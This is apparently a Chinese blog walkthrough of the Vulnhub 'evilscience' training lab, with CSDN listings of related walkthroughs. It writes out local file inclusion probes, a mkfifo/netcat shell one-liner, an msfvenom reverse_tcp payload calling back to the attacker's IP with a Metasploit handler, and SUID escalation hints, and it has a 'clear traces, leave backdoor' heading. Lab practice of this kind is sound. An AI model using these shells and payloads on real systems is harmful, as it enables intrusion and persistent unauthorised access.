靶机记录(十二):evilscience

最新推荐文章于 2023-02-19 20:20:49 发布
最新推荐文章于 2023-02-19 20:20:49 发布
阅读量209 收藏 1
点赞数
文章标签: web渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47306547/article/details/121056248
版权

目录

主机发现

端口扫描

SSH尝试连接

Web渗透

漏洞挖掘

GetShell 

 法一

 法二(MSF)

 提权

 法一(失败了)

 法二(脏牛,也失败了。。)​​​

 法三

 法四

 法五

 flag

清痕迹,留后门

主机发现

端口扫描

 

 SSH尝试连接

 

Web渗透

漏洞挖掘

试试其他的路径 :

/var/log/apache2/access.log
/var/log/apache/access.log     -----WEB 日志文件
/var/www/log/access.log 

                                全失败

尝试读取以下配置文件 :

/etc/apache2/apache2.conf       失败



尝试伪协议读取:
file=php://filter/convert.base64-encode/resource=index.php    失败

PHP伪协议读取试试也是失败的

 由于开了22,80,web日志不行,看一下 SSH 日志

 

GetShell 

 法一

依次执行

mkfifo /tmp/t
编码:mkfifo+/tmp/t

cat /tmp/t | /bin/sh -i 2>&1 | nc -l 1234 > /tmp/t
编码:cat+/tmp/t+|+/bin/sh+-i+2>%261+|+nc%20-l+1234+>+/tmp/t;

 

 法二(MSF)

生成木马脚本:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机上的端口 -f elf > GetShell.elf



use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp 
set lhost 攻击机IP
set lport 攻击机端口号
run

 

 提权

 法一(失败了)

在靶机上下载后 解析的时候都失败了  -> 啥也不是

 法二(脏牛,也失败了。。)

 法三

 

这个文件 而这个文件是具有s权限的  
!!有的S标志位文件可写,有的不可写但是可以执行通过管道符一并执行我们的马,有的不可写但是可以调用,通过伪造同样文件名来执行eg:$PATH

 

 法四

 法五

 

 flag

清痕迹,留后门

源十三
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
OSCP-Vulnhub靶机记录-Development-walkthrough
深入交流学习:webMsec
09-30 459
提示我们有隐藏页面html_pages、有IDS(难怪刚才目录都没扫出来)cd /etc/passwd 发现patrick可运行 /bin/bash。echo os.system(‘/bin/bash’)获得shell。前面看到22端口,尝试ssh登陆,只有intern登录成功。得到靶机ip 192.168.52.137。用之前的密码切换为patrick用户。敏感信息泄露,拼接目录试一下。明显是MD5,解密走一波。尝试vim SUID提权。
evilscience 靶机渗透
weixin_44769042的博客
10-30 266
目录 主机发现 端口扫描 服务版本,操作系统扫描 开始渗透 反弹shell 提权 提权成功,得到flag 总结 主机发现 这两个ip mac地址是一样的,随便用一个就行 端口扫描 服务版本,操作系统扫描 开始渗透 1> web端目录扫描 这个页面有个下载,但是没啥用 扫了一堆都没啥用 2> 主页找到一个类似文件包含的特征点 尝试包含一下/etc/passwd,,结果没啥用 3> 用字典跑一下包含目录 找到几个...
kali渗透综合靶机(十六)--evilscience靶机
W小哥
04-02 1031
https://download.vulnhub.com/theether/theEther_1.0.1.zip
Evilscience靶机渗透实战-vulnhub系列(五)
PANDA墨森的博客
07-04 541
这是vulnhub靶机系列文章的第五篇,本次的靶机主要学习到的漏洞利用为文件包含漏洞,话不多说,直接开始吧... 靶机下载地址:https://www.vulnhub.com/entry/the-ether-evilscience,212 原文链接:https://www.cnblogs.com/PANDA-Mosen/p/13195877.html #001 环境搭建(nat) 攻击机kali:192168.136.129 靶机evilscience:192.168.136.143 ..
Vulnhub靶机系列:De-ICE: S1.120
01-09
文章目录靶机地址靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址 https://www.vulnhub.com/entry/de-ice-s1120,10/ 靶机设置 靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有...
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机是Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
攻击机和靶机的使用说明:kali linux和OWAS详细使用教程.pdf
04-14
攻击机和靶机的使用说明:kali linux和OWAS详细使用教程 网卡的详细配置 ## WEB服务器OWASP靶机 ### 下载地址:https://sourceforge.net/projects/owaspbwa/files/ ### web apps: http://192.168.0.113/ #### ...
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
vulnhub靶机实战-My-cmsms靶机
最新发布
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
靶机实战-evilscience
滕财然的博客
01-28 635
evilscience靶机实战 文章目录evilscience靶机实战1、主机发现2、端口扫描3、端口详情扫描4、访问80端口5、提权方法一方法二 1、主机发现 目标IP:192.168.232.164 2、端口扫描 3、端口详情扫描 22端口–ssh、80端口–http 4、访问80端口 浏览网站,寻找有价值的信息 发现该网站有可能存在LFI(本地文件包含) 在about.php页面看...
VulnHub渗透测试实战靶场 - THE ETHER: EVILSCIENCE
LYJ20010728的博客
08-07 1061
VulnHub渗透测试实战靶场 - THE ETHER: EVILSCIENCE环境下载THE ETHER: EVILSCIENCE靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 THE ETHER: EVILSCIENCE靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 攻击机IP地址:192.168.246.129 渗透测试 信息搜集 用netdiscover查看一下:sudo netdiscover -r 192.168.246.0
Evilscience 渗透测试
Darklord.W
04-14 659
Evilscience渗透测试 0x00实验环境 靶机Evilscience,IP地址:192.168.8.147 测试机:Kali,IP地址:192.168.8.145; 0x01实验流程 信息收集——主机发现、端口扫描 渗透测试 0x02实验步骤 主机发现 端口及服务扫描 探测web端 在url中发现疑似文件包含 扫描web目录 尝试文件包...
Vulnhub 渗透练习(八)—— THE ETHER: EVILSCIENCE
shinygod的博客
02-19 598
本地文件包含:利用 ssh 登录产生错误日志写入一句话木马(ssh ''@ip)seclists 字典:https://github.com/danielmiessler/SecListssudo -l。
靶机渗透(十二)evilscience
qq_42180996的博客
05-23 1563
靶机evilscience 一、实验环境 二、实验步骤 (一)信息收集 1.查看测试机的IP信息,判断所处网段 2.主机发现(netdiscover) 3.端口扫描(masscan/nmap) 4.网站指纹信息扫描(whatweb) (二)Web渗透 1.浏览web网页(80端口) 2.目录扫描(dirb) 3.文件包含漏洞利用 >另一种执行ls命令的方法 4...
The Ether: EvilScience靶机渗透实战总结
weixin_34220834的博客
08-20 1099
近期朋友给我发了一个靶机,说是他在日志注入的时候遇到了一点小问题,让我帮忙解决一下。下载下来之后,感觉这个靶机还是挺不错的,里边有一些套路,于是整理成一篇文章,感兴趣的小伙伴可以自己尝试一下。 靶机下载https://www.vulnhub.com/entry... 信息收集首先扫描内网,发现目标主机ip arp-scan -l ...
渗透笔记-Evil-Droid学习
qq_21522815的博客
07-09 2531
行行行
靶机渗透(一)Lazysysadmin
qq_42180996的博客
04-26 3811
靶机Lazysysadmin 一、实验环境 二、实验步骤 (一)信息收集 1.查询测试机IP地址,判断所处网段 2.主机发现(netdiscover) 3.端口扫描(masscan/namp) (二)漏洞扫描 1.开启nessusd服务,加载插件,登录 2.建立扫描 3.扫描结果 (三)ssh爆破(22端口) 1.启动msf终端 2.搜索ssh_login的相关工具...
靶机渗透------DC-3
Z_Grant的博客
09-19 5593
文章目录一,工具学习二,测试流程(1)信息收集 一,工具学习 二,测试流程 (1)信息收集
vulnhub靶机——raven: 2
09-03
- *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值